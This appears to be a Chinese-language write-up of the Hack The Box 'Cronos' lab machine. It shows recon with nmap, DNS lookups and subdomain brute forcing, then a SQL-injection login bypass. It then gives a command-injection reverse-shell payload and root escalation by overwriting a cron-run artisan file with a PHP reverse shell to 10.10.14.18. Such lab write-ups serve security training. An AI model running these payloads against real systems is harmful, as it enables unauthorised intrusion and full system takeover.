cronos

IP：10.10.10.13

scan

┌──(xavier㉿kali)-[~]
└─$ sudo nmap -sSV -T4 10.10.10.13
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-06 23:19 CST
Nmap scan report for 10.10.10.13
Host is up (0.23s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open  domain  ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.45 seconds

web

80就是一个Apache默认页面，扫路径扫了半天也没有结果。

想想服务器开了53端口DNS服务，应该是有用的，反向解析IP：

┌──(xavier㉿kali)-[~]
└─$ nslookup -ty=ptr 10.10.10.13 10.10.10.13
Server:         10.10.10.13
Address:        10.10.10.13#53

13.10.10.10.in-addr.arpa        name = ns1.cronos.htb.

绑定Host或设置DNS服务器

┌──(xavier㉿kali)-[~]
└─$ sudo vim /etc/hosts

#文末添加下述内容：
10.10.10.13	ns1.cronos.htb
10.10.10.13	www.cronos.htb
10.10.10.13	cronos.htb

简单分析一下网页，应该是个CMS，附上了GitHub地址：https://github.com/laravel/laravel

再次扫描Web路径：

┌──(xavier㉿kali)-[~]
└─$ dirsearch -u http://cronos.htb -e php,html,txt -x 403 -t 100

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, html, txt | HTTP method: GET | Threads: 100 | Wordlist size: 9901

Output File: /home/xavier/.dirsearch/reports/cronos.htb/_23-04-06_23-50-32.txt

Error Log: /home/xavier/.dirsearch/logs/errors-23-04-06_23-50-32.log

Target: http://cronos.htb/

[23:50:33] Starting: 
[23:50:56] 301 -  306B  - /css  ->  http://cronos.htb/css/
[23:50:58] 200 -    0B  - /favicon.ico
[23:51:01] 200 -    2KB - /index.php
[23:51:02] 200 -  924B  - /js/
[23:51:02] 301 -  305B  - /js  ->  http://cronos.htb/js/
[23:51:10] 200 -   24B  - /robots.txt
[23:51:16] 200 -  914B  - /web.config

Task Completed

没找到利用的点

又调回去看DNS，枚举一下其他的域名：

┌──(xavier㉿kali)-[~]
└─$ dnsenum --dnsserver 10.10.10.13 cronos.htb
dnsenum VERSION:1.2.6

-----   cronos.htb   -----

Host's addresses:
__________________
cronos.htb.                              604800   IN    A        10.10.10.13

Name Servers:
______________
ns1.cronos.htb.                          604800   IN    A        10.10.10.13

Mail (MX) Servers:
___________________


Trying Zone Transfers and getting Bind Versions:
_________________________________________________

unresolvable name: ns1.cronos.htb at /usr/bin/dnsenum line 900.
                                                                                                    
Trying Zone Transfer for cronos.htb on ns1.cronos.htb ... 
AXFR record query failed: no nameservers

                                                                                                    
Brute forcing with /usr/share/dnsenum/dns.txt:                                                      
_______________________________________________                                                     
                                                                                                    
admin.cronos.htb.                        604800   IN    A        10.10.10.13   

又找到个域名：admin.cronos.htb

扫路径

登录暴破，发现存在万能密码登录 admin’or 1=1 --+

进入后台

看看有没有命令注入：

nc 反弹shell，payload：

command=/bin/bash+-c+"/bin/bash+-i+>%26+/dev/tcp/10.10.14.18/8888+0>%261"&host=

┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 8888
listening on [any] 8888 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 42952
bash: cannot set terminal process group (1337): Inappropriate ioctl for device
bash: no job control in this shell
www-data@cronos:/var/www/admin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@cronos:/var/www/admin$

root

信息搜集，找到计划任务：

www-data@cronos:/var/www/laravel$ cat /etc/cron*
cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
#

注意到会以root权限定期执行/var/www/laravel/artisan，修改该文件

www-data@cronos:/var/www/laravel$ echo '<?php exec("/bin/bash -c '"'"'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'"'"'");' > artisan
<& /dev/tcp/10.10.14.18/9999 0>&1'"'"'");' > artisan                         
www-data@cronos:/var/www/laravel$ cat artisan
cat artisan
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.18/9999 0>&1'");
www-data@cronos:/var/www/laravel$ 

另一边nc监听999端口，

┌──(xavier㉿kali)-[~]
└─$ nc -nlvp 9999
listening on [any] 9999 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.13] 39564
bash: cannot set terminal process group (5955): Inappropriate ioctl for device
bash: no job control in this shell
root@cronos:~# id
id
uid=0(root) gid=0(root) groups=0(root)
root@cronos:~# cat /root/root.txt
cat /root/root.txt
708bxxxxxxxxxxx0c3b
root@cronos:~#